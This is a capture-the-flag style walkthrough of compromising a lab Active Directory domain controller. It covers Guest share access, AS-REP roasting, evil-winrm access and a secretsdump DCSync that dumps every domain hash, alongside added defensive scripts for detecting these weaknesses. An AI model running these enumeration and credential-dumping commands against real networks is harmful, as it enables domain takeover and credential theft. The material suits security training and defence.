MartiniAD Active Directory Lab Walkthrough [HackSmarter]
Published 2026-05-19 09:01:33. Author: infosecwriteups.com

incoggeek

Hey hackers!

Hope you’re all doing great and staying curious. Lately, I’ve been spending a lot of time diving into Active Directory. If you’re working in the corporate world, you know AD is basically the heart of the network which also makes it the biggest target.

I’ve been solving another AD lab to sharpen my skills, and I wanted to share a writeup of one I just finished. It was a great reminder of how a few small misconfigurations can lead to a total compromise.

1. Host Configuration

Before jumping into the tools, I updated my /etc/hosts file. This ensures that when we call the Domain Controller or the domain itself, our system knows exactly where to route the traffic.

Open the file with sudo: sudo nano /etc/hosts


And add the following entry (I found these hostnames during basic recon):

machine-ip dc01.dry.martini.bars dc01 dry.martini.bars

Once that’s saved, we can start interacting with the dry.martini.bars domain using its proper hostnames.

2. Initial Reconnaissance

# Nmap 7.94SVN scan initiated Fri May 15 00:48:42 2026 as: /usr/lib/nmap/nmap -vvv -p 53,88,139,135,389,445,464,593,636,3269,3268,3389,5985,9389,49664,49667,49668,49670,49677,49678,49698,49710,58002 -4 -sC -sV -oN maritinAD 10.1.104.32
Nmap scan report for 10.1.104.32
Host is up, received echo-reply ttl 126 (0.40s latency).
Scanned at 2026-05-15 00:48:42 EDT for 168s

PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 126 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-05-15 04:48:50Z)
135/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: DRY.MARTINI.BARS0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 126
464/tcp open kpasswd5? syn-ack ttl 126
593/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 126
3268/tcp open ldap syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: DRY.MARTINI.BARS0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 126
3389/tcp open ssl/ms-wbt-server? syn-ack ttl 126
| ssl-cert: Subject: commonName=DC01.DRY.MARTINI.BARS
| Issuer: commonName=DC01.DRY.MARTINI.BARS
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-01-16T01:19:23
| Not valid after: 2026-07-18T01:19:23
| MD5: e45f:2ccb:66e0:e93a:ce42:62b8:4f09:0850
| SHA-1: 2ffc:e1c5:3163:c9dd:cf69:e82a:b091:67a3:1324:0dc7
| -----BEGIN CERTIFICATE-----
| MIIC7jCCAdagAwIBAgIQTPVeL4Dy9LpJHK+XV9l0XTANBgkqhkiG9w0BAQsFADAg
| MR4wHAYDVQQDExVEQzAxLkRSWS5NQVJUSU5JLkJBUlMwHhcNMjYwMTE2MDExOTIz
| WhcNMjYwNzE4MDExOTIzWjAgMR4wHAYDVQQDExVEQzAxLkRSWS5NQVJUSU5JLkJB
| UlMwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDJ/g3psOOQlBbVnAig
| rAYTEQ8FxugvGM5s7YHuxmG/gP5Iv8bXE0vUo8XbK5ycmrnRbmFfqMM6VWNHqMHt
| J1hZj8Lrg0++mn+fAO4yoelcTIZqMp+zdXlkKZJZMUjarKz3QJPBMLJPDIbP9FZI
| j9p/UldHNLJ2IUKYk13YRq3tHwiUJcIvZYp7cGGwhCBE1j5jrNYPl2wFEFh8T52k
| zDK3AvqPF8GrMrdeMM8XfbfG4XqFksw6Th0hbLErFlwDu9wqR9gVJNwtR0Ax4UKV
| KGbFxwB/H8EQjTiRIs9V7oRp2Faimv9DhgeNcs1nx2JsJaYR0zIRdpMg+XqvWUlK
| +GMVAgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAsGA1UdDwQEAwIEMDAN
| BgkqhkiG9w0BAQsFAAOCAQEAJCrr+jqxs05xpZsTgAAU0PM+kz8a7vfYPxCqGQnJ
| xq88r8WEm9czyGx5YEzF9dRhQdPJvYjXQTsyhqqi/Jo1GklBczktoSSF/BtPGh5f
| abY/WNHhSDxTvdRSXB2VTY1EuU5JOJZZF0gilntX8xw3WnWPlBVKQAIAnFU2Qtsr
| Tgb+xv6Qat3PlC6d3R/zYAGUyRCsHfz95743eZzQhouns47XUevMRAG+2BEDyeDI
| Cpw1SvP5JoRG4uC5vPcbJ1ZOzLTnZN88hdSv4ysqLY8fSZli7deTaGMm7HG6pQKe
| qJJ/d0iwa+CuGAsG4RziqAuWJ1qOdwh3AjaGd1no7kXmxQ==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| rdp-ntlm-info:
| Target_Name: DRY
| NetBIOS_Domain_Name: DRY
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: DRY.MARTINI.BARS
| DNS_Computer_Name: DC01.DRY.MARTINI.BARS
| Product_Version: 10.0.26100
|_ System_Time: 2026-05-15T04:50:40+00:00
5985/tcp open http syn-ack ttl 126 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 126 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49677/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49678/tcp open ncacn_http syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
49698/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
49710/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
58002/tcp open msrpc syn-ack ttl 126 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2026-05-15T04:50:43
|_ start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 56988/tcp): CLEAN (Timeout)
| Check 2 (port 43134/tcp): CLEAN (Timeout)
| Check 3 (port 64645/udp): CLEAN (Timeout)
| Check 4 (port 57066/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked

A critical distinction must be made between Anonymous Logons and the Guest account. An anonymous logon is an unauthenticated state (a Null Session) that modern operating systems strictly restrict. The Guest account, by contrast, is a legitimate, built-in security principal. When it is left enabled and granted Read/Write permissions on shares, it lets unauthenticated network actors act as a local user, leading to unauthorized data exposure and a total loss of non-repudiation in the security logs (every action is attributed to "Guest").

[Screenshot: share enumeration with an anonymous logon] No Access

[Screenshot: share enumeration with the Guest account] Read/Write Access

A critical finding during the share enumeration phase was a leaky file share. A readable text file, notes.txt, exposed operational habits and, crucially, an entry point:

[Screenshot: notes.txt on the share]

Downloaded it and found AD user creds:
cat notes.txt
- Order more gin for lakeside
- Look for an engagement ring
- Check that notes works from Linux Mint

creds
redacted

User Enumeration

With a valid foothold established through the compromised credentials of mprice, the next step was active user enumeration. Instead of blind brute-forcing, I used the authenticated session to pull a definitive list of valid domain users. The goal was to feed these usernames into an AS-REP Roasting attack.


nxc smb 10.1.104.32 -u "redacted" -p "redacted" --users | awk '{print $5}' | sed -n '4,9p' | tee users


3. AS-REP Roasting

The tool pulled an AS-REP hash for one AD user. That account is vulnerable because Kerberos pre-authentication is disabled on it: the KDC will return an AS-REP encrypted with the user's password-derived key to anyone who asks, and that blob can be cracked offline.

[Screenshot: AS-REP Roasting output]

Identified an account with UF_DONT_REQUIRE_PREAUTH enabled
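Both findings so far (an enabled Guest account and an account with UF_DONT_REQUIRE_PREAUTH) are bits in the userAccountControl attribute. The following is an added example, not code from the writeup or from any tool it uses: it decodes userAccountControl values from a constructed list of user records, reports accounts that are AS-REP roastable, and checks whether the built-in Guest account is enabled. The flag constants and the LDAP matching-rule filter are the standard Microsoft values; the sample users and their values are made up for the example and are not the lab's accounts.

```python
"""Audit userAccountControl flags in a constructed list of AD user records."""

# Flag bits of the userAccountControl attribute (standard Microsoft constants,
# not values from the writeup).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000  # decimal 4194304: AS-REP roastable

FLAG_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQ_PREAUTH",
}

# LDAP filter that asks the DC for the same thing, using the bitwise-AND
# matching rule OID. Run it with an authenticated bind during an audit.
PREAUTH_DISABLED_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    "(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
)

# Constructed sample, shaped like the attributes an LDAP query returns.
# These are not the lab's real users or values.
SAMPLE_USERS = [
    {"sAMAccountName": "Guest", "userAccountControl": 0x10200},        # enabled, password never expires
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x410200},  # normal account + DONT_REQ_PREAUTH
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200},
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x202},         # disabled, as expected
]


def decode_uac(value):
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in FLAG_NAMES.items() if value & bit]


def preauth_disabled(users):
    """Accounts that hand an AS-REP to anyone: roastable offline."""
    return sorted(u["sAMAccountName"] for u in users
                  if u["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH)


def guest_enabled(users):
    """True if the built-in Guest account is present and not disabled."""
    for u in users:
        if u["sAMAccountName"].lower() == "guest":
            return not (u["userAccountControl"] & UF_ACCOUNTDISABLE)
    return False


def audit(users):
    """One finding line per issue, in a stable order."""
    findings = []
    if guest_enabled(users):
        findings.append("Guest account is enabled; disable it (set ACCOUNTDISABLE)")
    for name in preauth_disabled(users):
        findings.append(f"{name}: DONT_REQ_PREAUTH set; AS-REP roastable, re-enable pre-authentication")
    return findings


if __name__ == "__main__":
    for u in SAMPLE_USERS:
        print(f"{u['sAMAccountName']:12} {u['userAccountControl']:#08x} {decode_uac(u['userAccountControl'])}")
    print()
    for line in audit(SAMPLE_USERS):
        print("FINDING:", line)
```

In a real audit the records would come from an LDAP search with PREAUTH_DISABLED_FILTER (or a plain search returning userAccountControl), and the fix for each finding is a one-bit change: clear DONT_REQ_PREAUTH, set ACCOUNTDISABLE on Guest.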

4. Password Cracking

[Screenshot: cracking the AS-REP hash offline]

5. Remote Connection (Evil-WinRM)

I leveraged evil-winrm to authenticate to the Domain Controller using the newly acquired credentials.

[Screenshot: PowerShell session on the Domain Controller via evil-winrm]

6. Secret Dumps

This step exploits credential reuse, which attackers test for with Password Spraying. In many environments, administrators or automated setups reuse the same password across multiple accounts (such as a standard service account and a high-privilege admin account) to make management easier.

Because I discovered that athena.t0 shared the exact same password (redacted) as athena_svc, I was able to pivot to an account that held explicit DCSync replication rights.
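The pivot works because the second account holds replication rights, and a DCSync is exactly what a defender can look for: a Security event 4662 in which a principal that is not a domain controller requests the DS-Replication-Get-Changes rights on the domain object. The block below is an added detection example, not the writeup's code or any vendor's rule. It runs over constructed, already-parsed 4662 records (shaped after the event's fields, not real log data); the replication-right GUIDs are the standard AD control-access-right GUIDs, the list of known DC accounts is an assumption for the example, and the unrelated GUID in the third record is a placeholder.

```python
"""Flag DCSync-style replication requests in constructed Security 4662 events."""
import re

# Control-access-right GUIDs a replication request asks for (standard AD
# values, not from the writeup).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# Principals that legitimately replicate: the DCs' computer accounts.
# Assumed for this example; DC01 matches the lab's DC name.
KNOWN_DC_ACCOUNTS = {"DC01$"}

GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# Constructed sample events, shaped like parsed 4662 ("An operation was
# performed on an object") fields. AccessMask 0x100 is Control Access.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectDomainName": "DRY",
     "AccessMask": "0x100",
     "Properties": f"{{{DS_REPLICATION_GET_CHANGES}}} {{{DS_REPLICATION_GET_CHANGES_ALL}}}"},
    {"EventID": 4662, "SubjectUserName": "athena.t0", "SubjectDomainName": "DRY",
     "AccessMask": "0x100",
     "Properties": f"{{{DS_REPLICATION_GET_CHANGES}}} {{{DS_REPLICATION_GET_CHANGES_ALL}}}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "DRY",
     "AccessMask": "0x10",
     "Properties": "{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"},  # placeholder, unrelated right
    {"EventID": 4624, "SubjectUserName": "athena.t0", "SubjectDomainName": "DRY"},
]


def replication_guids(event):
    """The replication-right GUIDs present in the event's Properties field."""
    props = event.get("Properties", "")
    return {g.lower() for g in GUID_RE.findall(props)} & REPLICATION_GUIDS


def is_suspect_dcsync(event, dc_accounts=KNOWN_DC_ACCOUNTS):
    """A 4662 asking for replication rights from a principal that is not a DC."""
    if event.get("EventID") != 4662:
        return False
    if not replication_guids(event):
        return False
    return event.get("SubjectUserName", "") not in dc_accounts


def find_dcsync(events, dc_accounts=KNOWN_DC_ACCOUNTS):
    """Return 'DOMAIN\\user' for every suspect event, in log order."""
    return [f"{e['SubjectDomainName']}\\{e['SubjectUserName']}"
            for e in events if is_suspect_dcsync(e, dc_accounts)]


if __name__ == "__main__":
    for who in find_dcsync(SAMPLE_EVENTS):
        print("ALERT: non-DC principal requested replication rights:", who)
```

For these events to exist at all, "Audit Directory Service Access" must be enabled and the domain object needs a SACL entry for the replication rights; without that, the DCSync that secretsdump performs below leaves no 4662 behind.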

[Screenshot: athena.t0 holds replication rights]

secretsdump.py 'athena.t0:<redacted>@DC01.DRY.MARTINI.BARS'

[Screenshot: secretsdump output]

Got all the hashes.
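The same dump that ends the attack is also the audit artefact that would have caught the password reuse between athena_svc and athena.t0 beforehand: two accounts with the same NT hash have the same password. The following is an added example, not the writeup's code or part of impacket: it parses secretsdump-style NTDS lines (domain\user:RID:LM hash:NT hash:::), groups accounts by NT hash, and reports reuse and empty passwords. The sample dump is constructed; the NT hashes in it are placeholders except the well-known empty-password hash, and the account names only mirror the lab's.

```python
"""Find accounts sharing an NT hash in secretsdump-style NTDS output."""
from collections import defaultdict

# NT hash of the empty password (a well-known constant, not lab data).
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in secretsdump's NTDS line format. The LM field is the
# standard "no LM hash" value; the NT hashes are fake placeholders.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
dry.martini.bars\\athena_svc:1105:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
dry.martini.bars\\athena.t0:1106:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
dry.martini.bars\\mprice:1107:aad3b435b51404eeaad3b435b51404ee:44444444444444444444444444444444:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:55555555555555555555555555555555:::
[*] Cleaning up...
"""


def parse_secretsdump(text):
    """Yield (account, rid, nt_hash) from lines of the user:rid:lm:nt::: form."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # skip banners, status lines and anything malformed
        account = parts[0].split("\\")[-1]  # drop the domain prefix if present
        yield account, int(parts[1]), parts[3].lower()


def shared_hashes(text):
    """Map NT hash -> sorted accounts, for hashes used by more than one account."""
    by_hash = defaultdict(list)
    for account, _rid, nt in parse_secretsdump(text):
        by_hash[nt].append(account)
    return {nt: sorted(accts) for nt, accts in by_hash.items() if len(accts) > 1}


def empty_password_accounts(text):
    """Accounts whose NT hash is that of the empty password."""
    return sorted(a for a, _r, nt in parse_secretsdump(text) if nt == EMPTY_NT_HASH)


def privileged_reuse(text, privileged):
    """(privileged account, other account) pairs that share a password."""
    pairs = []
    for accts in shared_hashes(text).values():
        for p in accts:
            if p in privileged:
                pairs.extend((p, o) for o in accts if o != p)
    return sorted(pairs)


if __name__ == "__main__":
    for nt, accts in shared_hashes(SAMPLE_DUMP).items():
        print(f"password reuse ({nt[:8]}...): {', '.join(accts)}")
    print("empty passwords:", empty_password_accounts(SAMPLE_DUMP))
    # Assumed set of privileged accounts for the example (athena.t0 held DCSync rights in the lab).
    print("privileged reuse:", privileged_reuse(SAMPLE_DUMP, {"athena.t0"}))
```

Run the same check against an authorised export of your own NTDS data and the output is the list of accounts to reset; the privileged_reuse view is the one that mattered here, because a service-account password that is also an admin password turns any low-value leak into a domain compromise.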

Article source: https://infosecwriteups.com/martini-active-directory-lab-walkthrough-hacksmarter-f880eaa40f8d?source=rss----7b722bfd1b8d---4